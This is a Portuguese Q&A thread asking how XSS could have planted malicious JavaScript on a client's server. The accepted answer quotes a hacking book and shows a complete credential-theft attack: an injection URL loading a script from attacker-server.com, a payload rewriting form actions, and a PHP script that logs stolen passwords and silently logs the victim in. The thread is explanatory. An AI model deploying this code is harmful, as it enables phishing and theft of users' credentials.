# Ataques XSS, como ocorre?

Tags: javascript, php, segurança, xss

Recentemente um cliente foi vítima de ataques XSS.
Tratamos todos os inputs que encontramos com falhas, porém não consigo entender como foi inserido código JavaScript malicioso nos ficheiros ".js" no servidor.

Como é que alteraram o script via XSS?

Answer (score 19, accepted):

As informações abaixo foram retiradas do livro **Hacking: A Próxima Geração**.

---

**Injeção de Conteúdo utilizando Cross-Site Scripting (XSS)**

Entulhar toda a carga de XSS em uma cadeia de comandos pode ser confuso e complicado. Na maioria das vezes, o atacante terá que executar uma carga complicada para maximizar o impacto do ataque XSS. Em tais situações, o atacante pode usar arquivos externos [JavaScript](https://pt.stackoverflow.com/tags/javascript/info) para abrigar as cargas de exploração. Ele faz isso através da injeção de uma instrução script com um atributo src. O atributo src permite que o invasor especifique um arquivo JavaScript externo a ser executado no contexto do domínio que hospeda o aplicativo da Web que é vulnerável a XSS. Quando a injeção de um script com um atributo src em um código XSS é inserida, os atacantes costumam armazenar o arquivo JavaScript externo em um servidor web que eles controlam. Uma injeção típica de um arquivo de script externo usando XSS seria algo parecido com isto:

```
http://vulnerable-server.com/login.jsp?parameter="><script%20src="http://attacker-server.com/payload.js"></script>
```

Quando uma referência a um script externo é injetada, o atacante tem a opção de armazenar toda a carga de código de exploração no arquivo de script externo (neste caso, o arquivo em `http://attacker-server.com/payload.js`). Neste exemplo, o atacante usa o arquivo JavaScript externo para armazenar o código de exploração que varre os objetos `form` da página de login e altera `form action` para que as credenciais do usuário sejam transferidas para o servidor web do atacante. O código a seguir mostra o conteúdo do arquivo JavaScript externo `payload.js`:

```
for (i = 0; i < document.forms.length; i++)
{
    var originalaction = document.forms[i].action;
    document.forms[i].action =
      "http://attacker-server.com/cred-thief.php?orig=" + originalaction;
}
```

Essa carga de código `JavaScript` enumera todos os objetos `FORM`, grava o atributo `FORM ACTION` original e altera o atributo `ACTION` para apontar para o servidor web do atacante. Quando a vítima envia um formulário utilizando o botão "Entrar" na página de login que é vulnerável a XSS, seu nome de usuário e senha são passados ​​para o arquivo `cred-thief.php` no servidor web do atacante. Uma vez que servidor web do atacante recebe as credenciais da vítima, ele redireciona a vítima de volta para a página de login original e automaticamente conecta a vítima no aplicativo, mascarando o fato de que o seu nome de usuário e uma senha foram roubados. Veja o código de `cred-thief.php`:

```
<?php
// Is the orig parameter present?
if (isset($_GET['orig'])):

    // open the file for storing the stolen creds
    $fp = fopen("StolenCreds.txt", 'a');
    fwrite($fp, $_GET['orig']);

    // Create the initial HTML for the FORM with the
    // original URL for the ACTION
    echo "<html><body><form name='redirect' id='redirect'";
    echo " action='" . $_GET['orig'] . "' method='POST'>";

    // Loop through all the POST parameters stolen from the
    // original site and generate the correct form
    // elements and log the value to a text file
    foreach ($_POST as $var => $value) {
        echo "<input type='hidden' name='" . $var ."' value='" . $value ."'>";
        fwrite($fp,"var:".$var."  value:".$value."\r\n");
    }

    //complete the form and autosubmit the form using javascript
    echo "</form><script>document.redirect.submit()</script></body></html>";

else:
    //If orig is missing, redirect to back to the referring site
    header( 'Location: '. $HTTP_REFERER);

endif;

fclose($fp);
?>
```

As vulnerabilidades XSS em páginas de login podem ser devastadoras. Por exemplo, se um site bancário tem uma exposição XSS em qualquer local do seu domínio, um *phisher* sofisticado será capaz de usar a vulnerabilidade XSS para tirar vantagem do SSL (incluindo o Extended Validation SSL) e de filtros de *phishing*. Tais páginas de *phishing* vão exibir todos os certificados SSL legítimos e são indetectáveis ​​por filtros de *phishing*, ainda que eles contenham código de *phishing*. Ao usar um ataque XSS, como o mostrado anteriormente, o potencial phisher pode roubar as credenciais fornecidas para sites bancários, contornando todos os mecanismos atuais de proteção contra *phishing*.

---

Espero que este texto esclareça alguns procedimentos. Para mais informações recomendo ler todo o capítulo 2 do livro.

Comment: Me desculpe se houver muitos erros de tradução, não tive muito tempo para faze-la.

Comment: Primeiro, muito obrigado pelo eu tempo. Pelo que entendi, o hacker explorou uma falha no PHP primeiro, certo? Introduziu no conteúdo gravado na base de dados as tags "<script>" com o "src" a apontar para o script malicioso, estou certo? Assim quando o utilizador abre o conteúdo, o script js externo é executado. Pergunto isso porque no caso do nosso cliente, os ficheiros js foram mesmo editados e um pedaço do código fazia referência a um script externo. Como conseguiram inserir e salvar o novo conteúdo?

Comment: Isso mesmo. Uma hipótese é que o invasor conseguiu acesso ao seu servidor de alguma forma. Você possui serviços de acesso remoto habilitados? Se sim, já deu uma olhada nos logs?

Comment: o único acesso é via ftp, porém mudamos todas as senhas para garantir e restringimos acesso ao servidor ftp a um computador, pelo menos por enquanto. Uma dúvida, seria possível a edição de algum ficheiro via ataque XSS, sem passar pela base de dados? Pergunto porque até onde sei, o javascript é executado na maquina cliente, logo não iria conseguir editar nenhum ficheiro explorando uma falha através da técnica XXS, certo?

Comment: Teoricamente sim. Até onde eu sei não é possível editar através de XSS. Se alguém conseguir fazer isso, vamos ter sérios problemas futuramente...

Comment: Ok, obrigado pelo seu tempo, fiquei esclarecido.

Comment: Fico feliz em poder ajudar.